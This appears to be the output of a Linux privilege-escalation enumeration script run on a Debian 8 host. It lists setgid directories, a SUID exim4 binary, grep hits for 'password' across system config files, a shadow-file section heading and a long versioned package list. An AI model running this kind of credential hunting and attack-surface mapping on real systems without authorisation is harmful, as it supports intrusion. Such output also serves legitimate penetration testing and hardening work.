drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/fonts
drwxrwsr-x 7 root staff 4096 Mar 17 2016 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/ca-certificates
drwxrwsr-x 2 root staff 4096 Mar 17 2016 /usr/local/share/man
-rwsr-xr-x 1 root root 1085236 Mar 13 2016 /usr/sbin/exim4
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
/etc/exim4/exim4.conf.template:# Authenticators which rely on unencrypted clear text passwords don't
/etc/exim4/exim4.conf.template:# advertise unencrypted clear text password based authenticators on all
/etc/exim4/exim4.conf.template:# preferred over allowing clear text password based authenticators on
/etc/exim4/exim4.conf.template:# use), an authentication ID, and a password. The latter two appear as
/etc/exim4/exim4.conf.template:# valid username and password. In a real configuration you would typically
/etc/exim4/exim4.conf.template:# password are $auth1 and $auth2. Apart from that you can use the same
/etc/exim4/exim4.conf.template:# Authenticate against local passwords using sasl2-bin
/etc/exim4/exim4.conf.template:# # don't send system passwords over unencrypted connections
/etc/exim4/exim4.conf.template:# They get the passwords from CONFDIR/passwd.client, whose format is
/etc/exim4/exim4.conf.template:# Because AUTH PLAIN and AUTH LOGIN send the password in clear, we
/etc/exim4/exim4.conf.template:# clear text password authentication on all connections.
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/reportbug.conf:# Username and password for SMTP
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
Err?=(none)/Reinst-required (Status,Err:
Name Version Description
acl 2.2.52-2 Access control list utilities
acpi 1.7-1 displays information on ACPI devices
acpi-support-base 0.142-6 scripts for handling base ACPI events such as the power button
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
adduser 3.113+nmu3 add and remove users and groups
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
apt 1.0.9.8.2 commandline package manager
apt-listchanges 2.85.13+nmu1 package change history notification tool
apt-utils 1.0.9.8.2 package management related utility programs
aptitude 0.6.11-1+b1 terminal-based package manager
aptitude-common 0.6.11-1 architecture independent files for the aptitude package manager
aptitude-doc-en 0.6.11-1 English manual for aptitude, a terminal-based package manager
at 3.1.16-1 Delayed job execution and batch processing
base-files 8+deb8u3 Debian base system miscellaneous files
base-passwd 3.5.37 Debian base system master password and group files
bash 4.3-11+b1 GNU Bourne Again SHell
bash-completion 1:2.1-4 programmable completion for the bash shell
bc 1.06.95-9 GNU bc arbitrary precision calculator language
bind9-host 1:9.9.5.dfsg-9+deb8u6 Version of 'host' bundled with BIND 9.X
binutils 2.25-5 GNU assembler, linker and binary utilities
bsd-mailx 8.1.2-0.20141216cvs-2 simple mail user agent
bsdmainutils 9.0.6 collection of more utilities from FreeBSD
bsdutils 1:2.25.2-6 basic utilities from 4.4BSD-Lite
busybox 1:1.22.0-9+deb8u1 Tiny utilities for small and embedded systems
bzip2 1.0.6-7+b3 high-quality block-sorting file compressor - utilities
ca-certificates 20141019+deb8u1 Common CA certificates
console-setup 1.123 console font and keymap setup program
console-setup-linux 1.123 Linux specific part of console-setup
coreutils 8.23-4 GNU core utilities
cpio 2.11+dfsg-4.1+deb8u1 GNU cpio -- a program to manage archives of files
cpp 4:4.9.2-2 GNU C preprocessor (cpp)
cpp-4.9 4.9.2-10 GNU C preprocessor
cron 3.0pl1-127+deb8u1 process scheduling daemon
dash 0.5.7-4+b1 POSIX-compliant shell
dbus 1.8.20-0+deb8u1 simple interprocess messaging system (daemon and utilities)
dc 1.06.95-9 GNU dc arbitrary precision reverse-polish calculator
debconf 1.5.56 Debian configuration management system
debconf-i18n 1.5.56 full internationalization support for debconf
debian-archive-keyring 2014.3 GnuPG archive keys of the Debian archive
debian-faq 5.0.3 Debian Frequently Asked Questions
debianutils 4.4+b1 Miscellaneous utilities specific to Debian
dictionaries-common 1.23.17 spelling dictionaries - common utilities
diffutils 1:3.3-1+b1 File comparison utilities
discover 2.1.2-7 hardware identification system
discover-data 2.2013.01.11 Data lists for Discover hardware detection system
dmidecode 2.12-3 SMBIOS/DMI table decoder
dmsetup 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
dnsutils 1:9.9.5.dfsg-9+deb8u6 Clients provided with BIND
doc-debian 6.2 Debian Project documentation and other documents
docutils-common 0.12+dfsg-1 text processing system for reStructuredText - common data
docutils-doc 0.12+dfsg-1 text processing system for reStructuredText - documentation
dpkg 1.17.26 Debian package management system
e2fslibs:i386 1.42.12-1.1 ext2/ext3/ext4 file system libraries
e2fsprogs 1.42.12-1.1 ext2/ext3/ext4 file system utilities
eject 2.1.5+deb1+cvs20081104-13.1 ejects CDs and operates CD-Changers under Linux
emacsen-common 2.0.8 Common facilities for all emacsen
exim4 4.84.2-1 metapackage to ease Exim MTA (v4) installation
exim4-base 4.84.2-1 support files for all Exim MTA (v4) packages
exim4-config 4.84.2-1 configuration for the Exim MTA (v4)
exim4-daemon-light 4.84.2-1 lightweight Exim MTA (v4) daemon
file 1:5.22+15-2+deb8u1 Determines file type using "magic" numbers
findutils 4.4.2-9+b1 utilities for finding files--find, xargs
fontconfig 2.11.0-6.3 generic font configuration library - support binaries
fontconfig-config 2.11.0-6.3 generic font configuration library - configuration
fonts-dejavu-core 2.34-1 Vera font family derivate with additional characters
ftp 0.17-31 classical file transfer client
gcc 4:4.9.2-2 GNU C compiler
gcc-4.8-base:i386 4.8.4-1 GCC, the GNU Compiler Collection (base package)
gcc-4.9 4.9.2-10 GNU C compiler
gcc-4.9-base:i386 4.9.2-10 GCC, the GNU Compiler Collection (base package)
geoip-database 20150317-1 IP lookup command line tools that use the GeoIP library (country database)
gettext-base 0.19.3-2 GNU Internationalization utilities for the base system
gnupg 1.4.18-7 GNU privacy guard - a free PGP replacement
gnupg-agent 2.0.26-6 GNU privacy guard - password agent
gnupg2 2.0.26-6 GNU privacy guard - a free PGP replacement (new v2.x)
gpgv 1.4.18-7 GNU privacy guard - signature verification tool
grep 2.20-4.1 GNU grep, egrep and fgrep
groff-base 1.22.2-8 GNU troff text-formatting system (base system components)
grub-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files)
grub-pc 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS version)
grub-pc-bin 2.02~beta2-22+deb8u1 GRand Unified Bootloader, version 2 (PC/BIOS binaries)
grub2-common 2.02~beta2-22+deb8u1 GRand Unified Bootloader (common files for version 2)
gzip 1.6-4 GNU compression utilities
hicolor-icon-theme 0.13-1 default fallback theme for FreeDesktop.org icon themes
host 1:9.9.5.dfsg-9+deb8u6 Transitional package
hostname 3.15 utility to set/show the host name or domain name
iamerican 3.3.02-6 American English dictionary for ispell (standard version)
ibritish 3.3.02-6 British English dictionary for ispell (standard version)
ienglish-common 3.3.02-6 Common files for British and American ispell dictionaries
ifupdown 0.7.53.1 high level tools to configure network interfaces
info 5.2.0.dfsg.1-6 Standalone GNU Info documentation browser
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
install-info 5.2.0.dfsg.1-6 Manage installed documentation in info format
installation-report 2.58 system installation report
iproute2 3.16.0-2 networking and traffic control tools
iptables 1.4.21-2+b1 administration tools for packet filtering and NAT
iputils-ping 3:20121221-5+b2 Tools to test the reachability of network hosts
isc-dhcp-client 4.3.1-6+deb8u2 DHCP client for automatically obtaining an IP address
isc-dhcp-common 4.3.1-6+deb8u2 common files used by all of the isc-dhcp packages
iso-codes 3.57-1 ISO language, territory, currency, script codes and their translations
ispell 3.3.02-6 International Ispell (an interactive spelling corrector)
kbd 1.15.5-2 Linux console font and keytable utilities
keyboard-configuration 1.123 system-wide keyboard preferences
klibc-utils 2.0.4-2 small utilities built with klibc for early boot
kmod 18-3 tools for managing Linux kernel modules
krb5-locales 1.12.1+dfsg-19+deb8u2 Internationalization support for MIT Kerberos
laptop-detect 0.13.7 attempt to detect a laptop
less 458-3 pager program similar to more
libacl1:i386 2.2.52-2 Access control list shared library
libaio1:i386 0.3.110-1 Linux kernel AIO access library - shared library
libalgorithm-c3-perl 0.09-1 Perl module for merging hierarchies using the C3 algorithm
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
libapr1:i386 1.5.1-3 Apache Portable Runtime Library
libaprutil1:i386 1.5.4-1 Apache Portable Runtime Utility Library
libaprutil1-dbd-sqlite3:i386 1.5.4-1 Apache Portable Runtime Utility Library - SQLite3 Driver
libaprutil1-ldap:i386 1.5.4-1 Apache Portable Runtime Utility Library - LDAP Driver
libapt-inst1.5:i386 1.0.9.8.2 deb package format runtime library
libapt-pkg4.12:i386 1.0.9.8.2 package management runtime library
libarchive-extract-perl 0.72-1 generic archive extracting module
libasan1:i386 4.9.2-10 AddressSanitizer -- a fast memory error detector
libasprintf0c2:i386 0.19.3-2 GNU library to use fprintf and friends in C++
libassuan0:i386 2.1.2-2 IPC library for the GnuPG components
libatk1.0-0:i386 2.14.0-1 ATK accessibility toolkit
libatk1.0-data 2.14.0-1 Common files for the ATK accessibility toolkit
libatomic1:i386 4.9.2-10 support library providing __atomic built-in functions
libattr1:i386 1:2.4.47-2 Extended attribute shared library
libaudit-common 1:2.4-1 Dynamic library for security auditing - common files
libaudit1:i386 1:2.4-1+b1 Dynamic library for security auditing
libauthen-sasl-perl 2.1600-1 Authen::SASL - SASL Authentication framework
libavahi-client3:i386 0.6.31-5 Avahi client library
libavahi-common-data:i386 0.6.31-5 Avahi common data files
libavahi-common3:i386 0.6.31-5 Avahi common library
libbind9-90 1:9.9.5.dfsg-9+deb8u6 BIND9 Shared Library used by BIND
libblkid1:i386 2.25.2-6 block device id library
libboost-iostreams1.55.0:i386 1.55.0+dfsg-3 Boost.Iostreams Library
libbsd0:i386 0.7.0-2 utility functions from BSD systems - shared library
libbz2-1.0:i386 1.0.6-7+b3 high-quality block-sorting file compressor library - runtime
libc-bin 2.19-18+deb8u3 GNU C Library: Binaries
libc-dev-bin 2.19-18+deb8u3 GNU C Library: Development binaries
libc6:i386 2.19-18+deb8u3 GNU C Library: Shared libraries
libc6-dev:i386 2.19-18+deb8u3 GNU C Library: Development Libraries and Header Files
libc6-i686:i386 2.19-18+deb8u3 GNU C Library: Shared libraries [i686 optimized]
libcairo2:i386 1.14.0-2.1 Cairo 2D vector graphics library
libcap-ng0:i386 0.7.4-2 An alternate POSIX capabilities library
libcap2:i386 1:2.24-8 POSIX 1003.1e capabilities (library)
libcap2-bin 1:2.24-8 POSIX 1003.1e capabilities (utilities)
libcgi-fast-perl 1:2.04-1 CGI subclass for work with FCGI
libcgi-pm-perl 4.09-1 module for Common Gateway Interface applications
libcilkrts5:i386 4.9.2-10 Intel Cilk Plus language extensions (runtime)
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors
libclass-c3-perl 0.26-1 pragma for using the C3 method resolution order
libclass-c3-xs-perl 0.13-2+b1 Perl module to accelerate Class::C3
libclass-isa-perl 0.36-5 report the search path for a class's ISA tree
libcloog-isl4:i386 0.18.2-1+b2 Chunky Loop Generator (runtime library)
libcomerr2:i386 1.42.12-1.1 common error description library
libcpan-meta-perl 2.142690-1 Perl module to access CPAN distributions metadata
libcryptsetup4:i386 2:1.6.6-5 disk encryption support - shared library
libcups2:i386 1.7.5-11+deb8u1 Common UNIX Printing System(tm) - Core library
libcurl3-gnutls:i386 7.38.0-4+deb8u3 easy-to-use client-side URL transfer library (GnuTLS flavour)
libcwidget3:i386 0.5.17-2 high-level terminal interface library for C++ (runtime files)
libdata-optlist-perl 0.109-1 module to parse and validate simple name/value option pairs
libdata-section-perl 0.200006-1 module to read chunks of data from a module's DATA section
libdatrie1:i386 0.2.8-1 Double-array trie library
libdb5.3:i386 5.3.28-9 Berkeley v5.3 Database Libraries [runtime]
libdbd-mysql-perl 4.028-2+b1 Perl5 database interface to the MySQL database
libdbi-perl 1.631-3+b1 Perl Database Interface (DBI)
libdbus-1-3:i386 1.8.20-0+deb8u1 simple interprocess messaging system (library)
libdebconfclient0:i386 0.192 Debian Configuration Management System (C-implementation library)
libdevmapper1.02.1:i386 2:1.02.90-2.2 Linux Kernel Device Mapper userspace library
libdiscover2 2.1.2-7 hardware identification library
libdns-export100 1:9.9.5.dfsg-9+deb8u6 Exported DNS Shared Library
libdns100 1:9.9.5.dfsg-9+deb8u6 DNS Shared Library used by BIND
libedit2:i386 3.1-20140620-2 BSD editline and history libraries
libencode-locale-perl 1.03-1 utility to determine the locale encoding
libestr0 0.1.9-1.1 Helper functions for handling strings (lib)
libevent-2.0-5:i386 2.0.21-stable-2 Asynchronous event notification library
libexpat1:i386 2.1.0-6+deb8u1 XML parsing C library - runtime library
libfcgi-perl 0.77-1+b1 helper module for FastCGI
libffi6:i386 3.1-2+b2 Foreign Function Interface library runtime
libfile-listing-perl 6.04-1 module to parse directory listings
libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files
libfontconfig1:i386 2.11.0-6.3 generic font configuration library - runtime
libfreetype6:i386 2.5.2-3+deb8u1 FreeType 2 font engine, shared library files
libfuse2:i386 2.9.3-15+deb8u2 Filesystem in Userspace (library)
libgc1c2:i386 1:7.2d-6.4 conservative garbage collector for C and C++
libgcc-4.9-dev:i386 4.9.2-10 GCC support library (development files)
libgcc1:i386 1:4.9.2-10 GCC support library
libgcrypt20:i386 1.6.3-2+deb8u1 LGPL Crypto library - runtime library
libgdbm3:i386 1.8.3-13.1 GNU dbm database routines (runtime version)
libgdk-pixbuf2.0-0:i386 2.31.1-2+deb8u4 GDK Pixbuf library
libgdk-pixbuf2.0-common 2.31.1-2+deb8u4 GDK Pixbuf library - data files
libgeoip1:i386 1.6.2-4 non-DNS IP-to-country resolver library
libglib2.0-0:i386 2.42.1-1 GLib library of C routines
libglib2.0-data 2.42.1-1 Common files for GLib library
libgmp10:i386 2:6.0.0+dfsg-6 Multiprecision arithmetic library
libgnutls-deb0-28:i386 3.3.8-6+deb8u3 GNU TLS library - main runtime library
libgnutls-openssl27:i386 3.3.8-6+deb8u3 GNU TLS library - OpenSSL wrapper
libgomp1:i386 4.9.2-10 GCC OpenMP (GOMP) support library
libgpg-error0:i386 1.17-3 library for common error values and messages in GnuPG components
libgpgme11:i386 1.5.1-6 GPGME - GnuPG Made Easy (library)
libgpm2:i386 1.20.4-6.1+b2 General Purpose Mouse - shared library
libgraphite2-3:i386 1.3.6-1~deb8u1 Font rendering engine for Complex Scripts -- library
libgssapi-krb5-2:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - krb5 GSS-API Mechanism
libgtk2.0-0:i386 2.24.25-3 GTK+ graphical user interface library
libgtk2.0-bin 2.24.25-3 programs for the GTK+ graphical user interface library
libgtk2.0-common 2.24.25-3 common files for the GTK+ graphical user interface library
libharfbuzz0b:i386 0.9.35-2 OpenType text shaping engine (shared library)
libhogweed2:i386 2.7.1-5 low level cryptographic library (public-key cryptos)
libhtml-form-perl 6.03-1 module that represents an HTML form element
libhtml-format-perl 2.11-1 module for transforming HTML into various formats
libhtml-parser-perl 3.71-1+b3 collection of modules that parse HTML text documents
libhtml-tagset-perl 3.20-2 Data tables pertaining to HTML
libhtml-template-perl 2.95-1 module for using HTML templates with Perl
libhtml-tree-perl 5.03-1 Perl module to represent and create HTML syntax trees
libhttp-cookies-perl 6.01-1 HTTP cookie jars
libhttp-daemon-perl 6.01-1 simple http server class
libhttp-date-perl 6.02-1 module of date conversion routines
libhttp-message-perl 6.06-1 perl interface to HTTP style messages
libhttp-negotiate-perl 6.00-2 implementation of content negotiation
libicu52:i386 52.1-8+deb8u3 International Components for Unicode
libidn11:i386 1.29-1+b2 GNU Libidn library, implementation of IETF IDN specifications
libintl-perl 1.23-1 Uniforum message translations system compatible i18n library
libio-html-perl 1.001-1 open an HTML file with automatic charset detection
libio-socket-ip-perl 0.32-1 module for using IPv4 and IPv6 sockets in a protocol-independent way
libio-socket-ssl-perl 2.002-2+deb8u1 Perl module implementing object oriented interface to SSL sockets
libio-string-perl 1.08-3 Emulate IO::File interface for in-core strings
libirs-export91 1:9.9.5.dfsg-9+deb8u6 Exported IRS Shared Library
libisc-export95 1:9.9.5.dfsg-9+deb8u6 Exported ISC Shared Library
libisc95 1:9.9.5.dfsg-9+deb8u6 ISC Shared Library used by BIND
libisccc90 1:9.9.5.dfsg-9+deb8u6 Command Channel Library used by BIND
libisccfg-export90 1:9.9.5.dfsg-9+deb8u6 Exported ISC CFG Shared Library
libisccfg90 1:9.9.5.dfsg-9+deb8u6 Config File Handling Library used by BIND
libisl10:i386 0.12.2-2 manipulating sets and relations of integer points bounded by linear constraints
libitm1:i386 4.9.2-10 GNU Transactional Memory Library
libjasper1:i386 1.900.1-debian1-2.4+deb8u1 JasPer JPEG-2000 runtime library
libjbig0:i386 2.1-3.1 JBIGkit libraries
libjpeg62-turbo:i386 1:1.3.1-12 libjpeg-turbo JPEG runtime library
libjson-c2:i386 0.11-4 JSON manipulation library - shared library
libk5crypto3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Crypto Library
libkeyutils1:i386 1.5.9-5+b1 Linux Key Management Utilities (library)
libklibc 2.0.4-2 minimal libc subset for use with initramfs
libkmod2:i386 18-3 libkmod shared library
libkrb5-3:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries
libkrb5support0:i386 1.12.1+dfsg-19+deb8u2 MIT Kerberos runtime libraries - Support library
libksba8:i386 1.3.2-1 X.509 and CMS support library
liblcms2-2:i386 2.6-3+b3 Little CMS 2 color management library
libldap-2.4-2:i386 2.4.40+dfsg-1+deb8u2 OpenLDAP libraries
liblocale-gettext-perl 1.05-8+b1 module using libc functions for internationalization in Perl
liblockfile-bin 1.09-6 support binaries for and cli utilities based on liblockfile
liblockfile1:i386 1.09-6 NFS-safe locking library
liblog-message-perl 0.8-1 powerful and flexible message logging mechanism
liblog-message-simple-perl 0.10-2 simplified interface to Log::Message
liblogging-stdlog0:i386 1.0.4-1 easy to use and lightweight logging library
liblognorm1:i386 1.0.1-3 Log normalizing library
liblua5.1-0:i386 5.1.5-7.1 Shared library for the Lua interpreter version 5.1
liblwp-mediatypes-perl 6.02-1 module to guess media type for a file or a URL
liblwp-protocol-https-perl 6.06-2 HTTPS driver for LWP::UserAgent
liblwres90 1:9.9.5.dfsg-9+deb8u6 Lightweight Resolver Library used by BIND
liblzma5:i386 5.1.1alpha+20120614-2+b3 XZ-format compression library
libmagic1:i386 1:5.22+15-2+deb8u1 File type determination library using "magic" numbers
libmailtools-perl 2.13-1 Manipulate email in perl programs
libmnl0:i386 1.0.3-5 minimalistic Netlink communication library
libmodule-build-perl 0.421000-2 framework for building and installing Perl modules
libmodule-pluggable-perl 5.1-1 module for giving modules the ability to have plugins
libmodule-signature-perl 0.73-1+deb8u2 module to manipulate CPAN SIGNATURE files
libmount1:i386 2.25.2-6 device mounting library
libmpc3:i386 1.0.2-1 multiple precision complex floating-point library
libmpfr4:i386 3.1.2-2 multiple precision floating-point computation
libmro-compat-perl 0.12-1 mro::* interface compatibility for Perls < 5.9.5
libmysqlclient18:i386 5.5.47-0+deb8u1 MySQL database client library
libncurses5:i386 5.9+20140913-1+b1 shared libraries for terminal handling
libncursesw5:i386 5.9+20140913-1+b1 shared libraries for terminal handling (wide character support)
libnet-http-perl 6.07-1 module providing low-level HTTP connection client
libnet-smtp-ssl-perl 1.01-3 Perl module providing SSL support to Net::SMTP
libnet-ssleay-perl 1.65-1+b1 Perl module for Secure Sockets Layer (SSL)
libnetfilter-acct1:i386 1.0.2-1.1 Netfilter acct library
libnettle4:i386 2.7.1-5 low level cryptographic library (symmetric and one-way cryptos)
libnewt0.52:i386 0.52.17-1+b1 Not Erik's Windowing Toolkit - text mode windowing with slang
libnfnetlink0:i386 1.0.1-3 Netfilter netlink library
libnfsidmap2:i386 0.25-5 NFS idmapping library
libonig2:i386 5.9.5-3.2 Oniguruma regular expressions library
libp11-kit0:i386 0.20.7-1 Library for loading and coordinating access to PKCS#11 modules - runtime
libpackage-constants-perl 0.04-1 List constants defined in a package
libpam-modules:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM
libpam-modules-bin 1.1.8-3.1+deb8u1 Pluggable Authentication Modules for PAM - helper binaries
libpam-runtime 1.1.8-3.1+deb8u1 Runtime support for the PAM library
libpam0g:i386 1.1.8-3.1+deb8u1 Pluggable Authentication Modules library
libpango-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangocairo-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpangoft2-1.0-0:i386 1.36.8-3 Layout and rendering of internationalized text
libpaper-utils 1.1.24+nmu4 library for handling paper characteristics (utilities)
libpaper1:i386 1.1.24+nmu4 library for handling paper characteristics
libparams-util-perl 1.07-2+b1 Perl extension for simple stand-alone param checking functions
libparse-debianchangelog-perl 1.2.0-1.1 parse Debian changelogs and output them in other formats
libpci3:i386 1:3.2.1-3 Linux PCI Utilities (shared library)
libpcre3:i386 2:8.35-3.3+deb8u2 Perl 5 Compatible Regular Expression Library - runtime files
libperl4-corelibs-perl 0.003-1 libraries historically supplied with Perl 4
libpipeline1:i386 1.4.0-1 pipeline manipulation library
libpixman-1-0:i386 0.32.6-3 pixel-manipulation library for X and cairo
libpng12-0:i386 1.2.50-2+deb8u2 PNG library - runtime
libpod-latex-perl 0.61-1 module to convert Pod data to formatted LaTeX
libpod-readme-perl 0.11-1 Perl module to convert POD to README file
libpopt0:i386 1.16-10 lib for parsing cmdline parameters
libprocps3:i386 2:3.3.9-9 library for accessing process information from /proc
libpsl0:i386 0.5.1-1 Library for Public Suffix List (shared libraries)
libpth20:i386 2.0.7-20 GNU Portable Threads
libpython-stdlib:i386 2.7.9-1 interactive high-level object-oriented language (default python version)
libpython2.7-minimal:i386 2.7.9-2 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:i386 2.7.9-2 Interactive high-level object-oriented language (standard library, version 2.7)
libqdbm14 1.8.78-5+b1 QDBM Database Libraries without GDBM wrapper[runtime]
libquadmath0:i386 4.9.2-10 GCC Quad-Precision Math Library
libreadline6:i386 6.3-8+b3 GNU readline and history libraries, run-time libraries
libregexp-common-perl 2013031301-1 module with common regular expressions
librtmp1:i386 2.4+20150115.gita107cef-1 toolkit for RTMP streams (shared library)
libsasl2-2:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - authentication abstraction library
libsasl2-modules:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules (DB)
libselinux1:i386 2.3-2 SELinux runtime shared libraries
libsemanage-common 2.3-1 Common files for SELinux policy management libraries
libsemanage1:i386 2.3-1+b1 SELinux policy management library
libsepol1:i386 2.3-2 SELinux library for manipulating binary security policies
libsigc++-2.0-0c2a:i386 2.4.0-1 type-safe Signal Framework for C++ - runtime
libsigsegv2:i386 2.10-4+b1 Library for handling page faults in a portable way
libslang2:i386 2.3.0-2 S-Lang programming library - runtime version
libsmartcols1:i386 2.25.2-6 smart column output alignment library
libsoftware-license-perl 0.103010-3 module providing templated software licenses
libsqlite3-0:i386 3.8.7.1-1+deb8u1 SQLite 3 shared library
libss2:i386 1.42.12-1.1 command-line interface parsing library
libssh2-1:i386 1.4.3-4.1+deb8u1 SSH2 client-side library
libssl1.0.0:i386 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - shared libraries
libstdc++6:i386 4.9.2-10 GNU Standard C++ Library v3
libsub-exporter-perl 0.986-1 sophisticated exporter for custom-built routines
libsub-install-perl 0.928-1 module for installing subroutines into packages easily
libsub-name-perl 0.12-1 module for assigning a new name to referenced sub
libswitch-perl 2.17-2 switch statement for Perl
libsystemd0:i386 215-17+deb8u3 systemd utility library
libtasn1-6:i386 4.2-3+deb8u1 Manage ASN.1 structures (runtime)
libterm-readkey-perl 2.32-1+b1 perl module for simple terminal control
libterm-ui-perl 0.42-1 Term::ReadLine UI made easy
libtext-charwidth-perl 0.04-7+b3 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5+b2 converts between character sets in Perl
libtext-soundex-perl 3.4-1+b2 implementation of the soundex algorithm
libtext-template-perl 1.46-1 perl module to process text templates
libtext-unidecode-perl 1.22-1 Text::Unidecode -- US-ASCII transliterations of Unicode text
libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
libthai-data 0.1.21-1 Data files for Thai language support library
libthai0:i386 0.1.21-1 Thai language support library
libtiff5:i386 4.0.3-12.3+deb8u1 Tag Image File Format (TIFF) library
libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
libtinfo5:i386 5.9+20140913-1+b1 shared low-level terminfo library for terminal handling
libtirpc1:i386 0.2.5-1 transport-independent RPC library
libtokyocabinet9:i386 1.4.48-3 Tokyo Cabinet Database Libraries [runtime]
libubsan0:i386 4.9.2-10 UBSan -- undefined behaviour sanitizer (runtime)
libudev1:i386 215-17+deb8u3 libudev shared library
liburi-perl 1.64-1 module to manipulate and access URI strings
libusb-0.1-4:i386 2:0.1.12-25 userspace USB programming library
libusb-1.0-0:i386 2:1.0.19-1 userspace USB programming library
libustr-1.0-1:i386 1.0.4-3+b2 Micro string library: shared library
libuuid-perl 0.05-1+b1 Perl extension for using UUID interfaces as defined in e2fsprogs
libuuid1:i386 2.25.2-6 Universally Unique ID library
libwebp5:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpdemux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpmux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwrap0:i386 7.6.q-25 Wietse Venema's TCP wrappers library
libwww-perl 6.08-1 simple and consistent interface to the world-wide web
libwww-robotrules-perl 6.01-1 database of robots.txt-derived permissions
libx11-6:i386 2:1.6.2-3 X11 client-side library
libx11-data 2:1.6.2-3 X11 client-side library
libxapian22 1.2.19-1 Search engine library
libxau6:i386 1:1.0.8-1 X11 authorisation library
libxcb-render0:i386 1.10-3+b1 X C Binding, render extension
libxcb-shm0:i386 1.10-3+b1 X C Binding, shm extension
libxcb1:i386 1.10-3+b1 X C Binding
libxcomposite1:i386 1:0.4.4-1 X11 Composite extension library
libxcursor1:i386 1:1.1.14-1+b1 X cursor management library
libxdamage1:i386 1:1.1.4-2+b1 X11 damaged region extension library
libxdmcp6:i386 1:1.1.1-1+b1 X11 Display Manager Control Protocol library
libxext6:i386 2:1.3.3-1 X11 miscellaneous extension library
libxfixes3:i386 1:5.0.1-2+b2 X11 miscellaneous 'fixes' extension library
libxi6:i386 2:1.7.4-1+b2 X11 Input extension library
libxinerama1:i386 2:1.1.3-1+b1 X11 Xinerama extension library
libxml-libxml-perl 2.0116+dfsg-1+deb8u1 Perl interface to the libxml2 library
libxml-namespacesupport-perl 1.11-1 Perl module for supporting simple generic namespaces
libxml-parser-perl 2.41-3 Perl module for parsing XML files
libxml-sax-base-perl 1.07-1 base class for SAX drivers and filters
libxml-sax-expat-perl 0.40-2 Perl module for a SAX2 driver for Expat (XML::Parser)
libxml-sax-perl 0.99+dfsg-2 Perl module for using and building Perl SAX2 XML processors
libxml2:i386 2.9.1+dfsg1-5+deb8u1 GNOME XML library
libxmuu1:i386 2:1.1.2-1 X11 miscellaneous micro-utility library
libxrandr2:i386 2:1.4.2-1+b1 X11 RandR extension library
libxrender1:i386 1:0.9.8-1+b1 X Rendering Extension client library
libxtables10 1.4.21-2+b1 netfilter xtables library
linux-base 3.5 Linux image base package
linux-image-3.16.0-4-686-pae 3.16.7-ckt20-1+deb8u4 Linux 3.16 for modern PCs
linux-image-686-pae 3.16+63 Linux for modern PCs (meta-package)
